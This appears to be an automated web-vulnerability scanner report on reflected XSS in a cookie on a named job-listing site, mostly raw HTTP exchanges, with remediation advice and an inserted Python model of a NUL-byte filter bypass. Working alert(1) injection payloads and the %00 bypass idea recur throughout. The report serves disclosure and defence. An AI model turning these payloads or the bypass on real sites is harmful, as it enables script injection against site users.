MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endecca"><img src=a onerror=alert(1)>0dfd472147">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2e6"%3balert(1)//f30b745f3f1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e2e6";alert(1)//f30b745f3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to break out of the double-quoted JavaScript string and so inject arbitrary JavaScript into the application's response. As with the other script-context reflections on this host, the echoed value is upper-cased (ALERT(1)), so the payload exactly as submitted would not execute; re-verify the finding with a payload that remains valid after upper-casing before treating it as exploitable.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Note that the request recorded below does not itself contain a %00 sequence, so the filter bypass is asserted by the scanner rather than shown in the captured traffic; confirm it manually before relying on it.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context, and where it must, emit the value through a JavaScript-string encoder rather than raw. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter inspects only the bytes before the %00, while the application runtime, which keeps the full length-delimited string, processes everything after it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Rejecting any cookie or parameter that decodes to a NUL byte is also a safe interim rule, since no legitimate language code contains one.
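The following added example is a constructed model of the mechanism described above, not code from the report or from any WAF product: a filter with C-string semantics stops reading at the first NUL, while the application runtime decodes the whole value. The blocked-token list is an assumption; the sample input is this finding's payload, with %00 inserted ahead of the blocked characters as the report says it can be. A length-aware version of the filter, which rejects embedded NULs outright, is shown beside it.

```python
from urllib.parse import unquote

# Tokens a simple signature filter might look for (assumed for illustration).
BLOCKED_TOKENS = ('alert(', 'onerror', '<script')

# Payload from this finding, and the same payload with a URL-encoded NUL
# inserted ahead of the blocked characters (constructed sample input).
PAYLOAD = '2e2e6"%3balert(1)//f30b745f3f1'
PAYLOAD_WITH_NUL = '2e2e6"%00%3balert(1)//f30b745f3f1'


def native_filter_blocks(raw_value):
    """Model of a native-code filter: after URL-decoding, the value is handled
    as a NUL-terminated C string, so nothing past the first 0x00 is inspected."""
    decoded = unquote(raw_value)
    visible = decoded.split('\x00', 1)[0]
    return any(tok in visible.lower() for tok in BLOCKED_TOKENS)


def application_sees(raw_value):
    """The application runtime keeps the whole length-delimited string, NUL
    included, and echoes everything after it into the page."""
    return unquote(raw_value)


def length_aware_filter_blocks(raw_value):
    """Corrected filter: decode, reject any embedded NUL outright (no language
    code legitimately contains one), then inspect the entire value."""
    decoded = unquote(raw_value)
    if '\x00' in decoded:
        return True
    return any(tok in decoded.lower() for tok in BLOCKED_TOKENS)


if __name__ == '__main__':
    for value in (PAYLOAD, PAYLOAD_WITH_NUL):
        print(repr(application_sees(value)),
              'native filter blocks:', native_filter_blocks(value),
              'length-aware filter blocks:', length_aware_filter_blocks(value))
```

With the plain payload both filters block; with %00 inserted the native-style filter sees only 2e2e6" and lets the request through, yet the application still receives and echoes the alert(1) that follows the NUL.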
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2e2e6"%3balert(1)//f30b745f3f1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:22:15 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2E2E6";ALERT(1)//F30B745F3F1\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ad224"><img src=a onerror=alert(1)>cde72d257de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:14:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enad224"><img src=a onerror=alert(1)>cde72d257de">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e15f"><img src=a onerror=alert(1)>0848adce34d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:15:53'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en7e15f"><img src=a onerror=alert(1)>0848adce34d">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87b2f"%3balert(1)//9062e32d47a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 87b2f";alert(1)//9062e32d47a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en87b2f"%3balert(1)//9062e32d47a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:16:08'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN87B2F";ALERT(1)//9062E32D47A\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ecf6"%3balert(1)//f0243477b7 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ecf6";alert(1)//f0243477b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6ecf6"%3balert(1)//f0243477b7; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:15:05'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6ECF6";ALERT(1)//F0243477B7\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fd5"%3balert(1)//c5a2f006eb8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8fd5";alert(1)//c5a2f006eb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb8fd5"%3balert(1)//c5a2f006eb8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8FD5";ALERT(1)//C5A2F006EB8\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as dab86"><img src=a onerror=alert(1)>4a24dd4153a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=endab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:47 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
